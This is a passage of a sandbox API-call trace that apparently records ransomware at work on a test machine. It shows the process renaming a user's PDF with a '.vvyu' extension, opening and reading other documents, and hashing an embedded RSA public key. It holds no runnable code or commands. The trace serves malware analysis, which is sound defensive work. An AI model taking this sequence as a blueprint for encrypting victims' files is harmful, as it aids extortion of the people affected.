lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0195.319] CloseHandle (hObject=0x52c) returned 1 [0195.321] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee380 [0195.321] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8b0) returned 0x2d2cc80 [0195.321] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee380 | out: hHeap=0x6a0000) returned 1 [0195.322] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\UHfBjIaC\\yEpRZCn46rxjDOAUpD\\7 BOWSPyroI2Cx.pdf" (normalized: "c:\\users\\keecfmwgj\\documents\\azld\\uhfbjiac\\yeprzcn46rxjdoaupd\\7 bowspyroi2cx.pdf"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\UHfBjIaC\\yEpRZCn46rxjDOAUpD\\7 BOWSPyroI2Cx.pdf.vvyu" (normalized: "c:\\users\\keecfmwgj\\documents\\azld\\uhfbjiac\\yeprzcn46rxjdoaupd\\7 bowspyroi2cx.pdf.vvyu")) returned 1 [0195.323] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2cc80 | out: hHeap=0x6a0000) returned 1 [0195.324] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0195.324] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0195.327] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c5b3e8 | out: hHeap=0x6a0000) returned 1 [0195.327] FindNextFileW (in: hFindFile=0x2cbfa90, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfda2d600, ftCreationTime.dwHighDateTime=0x1d89bdb, ftLastAccessTime.dwLowDateTime=0x3e379be0, ftLastAccessTime.dwHighDateTime=0x1d89fad, ftLastWriteTime.dwLowDateTime=0x3e379be0, ftLastWriteTime.dwHighDateTime=0x1d89fad, nFileSizeHigh=0x0, nFileSizeLow=0x7e00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="feMArPT27Tt3Vq0tfRa.odp", cAlternateFileName="FEMARP~1.ODP")) returned 1 [0195.327] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0195.327] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xbe) returned 0x2c5b3e8 [0195.327] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0195.327] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\UHfBjIaC\\yEpRZCn46rxjDOAUpD\\feMArPT27Tt3Vq0tfRa.odp") returned=".odp" [0195.327] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\UHfBjIaC\\yEpRZCn46rxjDOAUpD\\feMArPT27Tt3Vq0tfRa.odp" (normalized: "c:\\users\\keecfmwgj\\documents\\azld\\uhfbjiac\\yeprzcn46rxjdoaupd\\femarpt27tt3vq0tfra.odp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x52c [0195.331] GetFileSizeEx (in: hFile=0x52c, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=32256) returned 1 [0195.331] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0195.334] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x7dda, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0195.334] ReadFile (in: hFile=0x52c, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0195.336] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0195.336] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0195.336] SetFilePointer (in: hFile=0x52c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0195.336] ReadFile (in: hFile=0x52c, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0x7e00, lpOverlapped=0x0) returned 1 [0195.337] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0195.337] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0195.337] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0195.338] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0195.338] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea678) returned 1 [0195.339] CryptCreateHash (in: hProv=0x6ea678, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0195.339] CryptHashData (hHash=0x2cbf990, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0195.339] CryptGetHashParam (in: hHash=0x2cbf990, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0195.339] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0195.339] CryptGetHashParam (in: hHash=0x2cbf990, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0195.339] GetLastError () returned 0x0 [0195.339] CryptDestroyHash (hHash=0x2cbf990) returned 1 [0195.339] CryptReleaseContext (hProv=0x6ea678, dwFlags=0x0) returned 1 [0195.339] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0195.339] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0195.339] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0195.339] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0195.339] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0195.339] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0195.340] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0195.340] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7e00) returned 0x2d49778 [0195.340] SetFilePointer (in: hFile=0x52c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0195.340] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0195.340] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0195.340] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0195.340] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0195.340] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0195.340] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d42610 [0195.340] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a090 [0195.340] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d42658 [0195.341] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a078 [0195.341] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a0f0 [0195.341] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a168 [0195.341] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a0d8 [0195.341] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0195.341] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2c84da8 [0195.341] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2c84da8, Size=0x218) returned 0x2d3b920 [0195.341] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0195.341] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a0f0 | out: hHeap=0x6a0000) returned 1 [0195.341] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a0d8 | out: hHeap=0x6a0000) returned 1 [0195.341] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a168 | out: hHeap=0x6a0000) returned 1 [0195.342] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0195.342] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0195.342] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a168 [0195.342] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37800 [0195.342] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a0d8 [0195.342] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c443e8 [0195.342] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d3a0f0 [0195.342] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37850 [0195.342] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2c70bc8 [0195.342] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0195.342] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0195.342] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0195.342] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0195.342] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44728 [0195.343] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0195.343] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0195.343] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a0d8 | out: hHeap=0x6a0000) returned 1 [0195.343] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0195.343] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a0f0 | out: hHeap=0x6a0000) returned 1 [0195.343] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c443e8 | out: hHeap=0x6a0000) returned 1 [0195.343] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37800 | out: hHeap=0x6a0000) returned 1 [0195.343] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a168 | out: hHeap=0x6a0000) returned 1 [0195.344] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0195.344] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0195.344] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b920 | out: hHeap=0x6a0000) returned 1 [0195.344] GetCurrentThreadId () returned 0x264 [0195.344] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c70bc8 [0195.344] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d46a20 [0195.344] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84cc0 [0195.344] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0195.344] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2d31688 [0195.344] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37800 [0195.345] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0195.345] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0195.345] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0195.345] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0195.345] GetCurrentThreadId () returned 0x264 [0195.345] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0195.345] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0195.345] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x74ad40 [0195.345] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0195.346] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0195.346] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0195.346] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0195.346] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0195.346] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0195.346] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37800 | out: hHeap=0x6a0000) returned 1 [0195.346] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82a60 [0195.346] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37800 [0195.346] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c03ca0 [0195.346] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0195.346] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a168 [0195.347] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0195.347] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0195.347] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0195.347] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0195.347] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0195.347] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0195.347] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0195.347] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0195.347] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a0f0 [0195.347] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0195.347] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37870 [0195.347] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0195.347] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0195.347] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0195.347] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0195.347] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0195.347] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a0d8 [0195.347] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0195.347] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c443e8 [0195.348] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0195.348] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a0c0 [0195.348] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0195.348] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a180 [0195.348] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0195.348] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378d0 [0195.348] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0195.348] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a150 [0195.348] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0195.348] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a138 [0195.348] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0195.348] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a198 [0195.348] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a138 | out: hHeap=0x6a0000) returned 1 [0195.348] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a138 [0195.348] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a150 | out: hHeap=0x6a0000) returned 1 [0195.348] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378a0 [0195.348] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37800 | out: hHeap=0x6a0000) returned 1 [0195.348] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0195.348] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0195.348] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27ce8 [0195.349] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a0f0 | out: hHeap=0x6a0000) returned 1 [0195.349] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a0f0 [0195.349] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0195.349] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2ccdff0 [0195.349] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a168 | out: hHeap=0x6a0000) returned 1 [0195.349] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0195.349] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a198 | out: hHeap=0x6a0000) returned 1 [0195.349] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d3b678 [0195.349] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0195.349] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c0ec50 [0195.349] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0195.349] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0195.349] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a0f0 | out: hHeap=0x6a0000) returned 1 [0195.349] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d2fc90 [0195.350] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0195.350] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c0d0a0 [0195.350] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0195.350] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0195.351] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0195.351] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c0d0a0 | out: hHeap=0x6a0000) returned 1 [0195.351] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0195.351] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0195.352] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b678 | out: hHeap=0x6a0000) returned 1 [0195.352] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0195.352] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c0ec50 | out: hHeap=0x6a0000) returned 1 [0195.352] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0195.352] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a138 | out: hHeap=0x6a0000) returned 1 [0195.353] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0195.353] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a180 | out: hHeap=0x6a0000) returned 1 [0195.353] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c443e8 | out: hHeap=0x6a0000) returned 1 [0195.353] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a0d8 | out: hHeap=0x6a0000) returned 1 [0195.353] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a0c0 | out: hHeap=0x6a0000) returned 1 [0195.353] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31688 | out: hHeap=0x6a0000) returned 1 [0195.353] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84cc0 | out: hHeap=0x6a0000) returned 1 [0195.354] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0195.354] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a078 | out: hHeap=0x6a0000) returned 1 [0195.354] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42658 | out: hHeap=0x6a0000) returned 1 [0195.354] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2ccdff0 | out: hHeap=0x6a0000) returned 1 [0195.354] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0195.355] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0195.355] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0195.355] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0195.355] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0195.355] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0195.355] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0195.356] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 